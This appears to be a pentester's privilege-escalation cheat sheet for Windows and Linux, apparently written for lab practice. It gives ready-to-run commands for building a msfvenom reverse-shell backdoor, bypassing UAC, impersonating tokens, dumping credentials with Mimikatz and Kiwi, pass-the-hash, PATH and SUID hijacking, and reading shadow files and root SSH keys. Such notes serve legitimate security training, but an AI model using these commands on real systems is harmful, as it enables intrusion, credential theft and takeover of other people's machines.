Privilege Escalation
Windows
Note: if you have a valid user credential you can authenticate in windows target from SMB, RDP, WinRM
Automation script
https://github.com/itm4n/PrivescCheck: useful for gather information
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
run from command prompt
UAC Bypass
User Account Control (UAC) is a feature that enables a consent prompt for elevated activities.
Prerequisites:
User must be a member of the Administrators group.
net localgroup administrators
Full interactive shell with the victim (a common nc.exe shell is not enough).
You can use meterpreter
Metasploit
search module bypassuac ...
UACME
If architecture is x64 it's better to use meterpreter x64 or migrate to process x64 with sessions=1
ps
to show process(ex.
migrate <PID explorer.exe>
)
Upload Akagi (Akagi64.exe if x64)
Create payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o backdoor.exe
Use exploit/multi/handler to start a listener
Akagi64.exe 23 <payload_full_path>
NOTE FULL PATH
Once run, we will get meterpreter session - getprivs/getsystem to get elevated privs
Impersonate Tokens
With msfconsole:
load incognito
list_tokens -u
impersonate_token <token_name>
impersonate_token ATTACKDEFENSE\\Administrator
NOTE: the two backslashes
You may need to migrate process to a <user> process
Ex.
getpid
: 2628,ps:
PID: 2948 | PPID: 2036 NAME: explorer.exe | ARCH: X64 | SESSION:1 | USER: ANTHING\Administrator | PATH: C:\Windows\explorer.exe
getpid
: 2948Of course you can repeat the process to become NT AUTHORITY\SYSTEM
Password in configuration file (Unattend.xml)
An answer file is an XML-based file that contains setting definitions and values to use during Windows Setup. Answer files (or Unattend files) are used by Administrators when they are setting up fresh images as it allows for an automated setup for Windows systems.
Extract password and decode it (from base64)
Credential Dumping (Mimikatz - Kiwi - Hashdump)
Prerequisites: User must be a member a local Administrators.
hashdump (Metasploit - Meterpreter)
You may need to migrate meterpreter to NT AUTHORITY\SYSTEM process (ex.
migrate <PID explorer.exe>
)hashdump
Kiwi (Metasploit - Meterpreter)
You may need to migrate meterpreter to NT AUTHORITY\SYSTEM process (ex.
migrate <PID explorer.exe>
)load kiwi
creds_all
Retrieve all credentials (parsed)lsa_dump_sam
Here you can see that NTLM hashes for all of the user accounts on the system.To find the clear text passwords :
lsa_dump_secrets
However, from the Windows version 8.0+, windows don’t store any plain text password. So, it can be helpful for the older version of the Windows.
Mimikatz
upload mimikatz.exe
\mimkatz.exe
privilege::debug
- should return Privilege '20' OK - This should be a standard for running mimikatz as it needs local administrator accesslsadump::sam
: NTLM hashes for all of the user accounts on the systemsekurlsa::logonpasswords
: To find the clear text passwords, but it's not always possible
Pass the Hash
crackmapexec smb <ip> -u <administrator> -H <NTLM hash> -x "ipconfig"
Metasploit : windows/smb/psexec and set SMBPass with
<LM hash>:<NTLM hash>
empty LM hash :
AAD3B435B51404EEAAD3B435B51404EE
(means its non-use).AAD3B435B51404EEAAD3B435B51404EE:<NTLM>
With
hashdump
you have the right format
Other
Powershell History
Saved Windows Credentials
cmdkey /list
runas /savecred /user:admin cmd.exe
Scheduled Tasks
Insecure Permissions on Service Executable
Unquoted Service Paths
Insecure Service Permissions
Windows Privileges
Unpatched Software
Linux
Vulnerable program
Search scripts that execute programs or programs. Search for any vulnerable version. One example: chkrootkit v0.49 (running as root)
ps aux
Weak Permissions
find / -not -type l -perm -o+w
world-writable filesExample: maybe you can edit shadow file...
Sudo
sudo -l
search on gtfobins how to exploit
SUID - custom binary
Premise: you have
binary_name
(with suid) that use/load/executeloaded_binary
Extract strings from the binary – look for shared libraries or binaries being loaded / executed at runtime
strings binary_name
Method
cp /bin/bash /path/to/loaded_binary
Method
Delete the loaded binary and replace with a new one:
gcc binary.c -o <loaded_binary>
: compile./binary_name
: run the binary
Other
sudo -l
setenv?
SUID/GUID
Look for capabilities
History Files
Docker group
Cron jobs
SSH Keys
PATH
NFS
Writable /etc/shadow
Writable /etc/passwd
Are there scripts that use commands?
If the command is executed without full path you can modify PATH variable
strings <program_name>
you see
tail -f /var/log/nginx/access.log
chmod +x /tmp/tail
export PATH=/tmp:$PATH
./<program_name>
Is there a database? Can I access to it?
Look at config file or source code of webpages connecting to db
Look at the source code of the php,py,jsp ... files of the website
Especially login files. Any password?
Writable authorized_key folder?
generate new ssh keys
Can I read some file with sudo?
/root/root.txt, /etc/shadow, /root/.ssh/id_rsa
Can I write a file in the root user directory?
generate ssh key with ssh-keygen and save it in the root user dir
Kernel Exploits
Linpeas.sh
Resource
juggernaut-sec.com/blog/ Windows/Linux privesc and active directory hacking
gtfobins.github.io GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
github.com/carlospolop/PEASS-ng/tree/master/linPEAS Linux Privilege Escalation Awesome Script
github.com/DominicBreuker/pspy Monitor linux processes without root permissions
github.com/gtworek/Priv2Admin Windows Privileges with Windows OS privileges
Last updated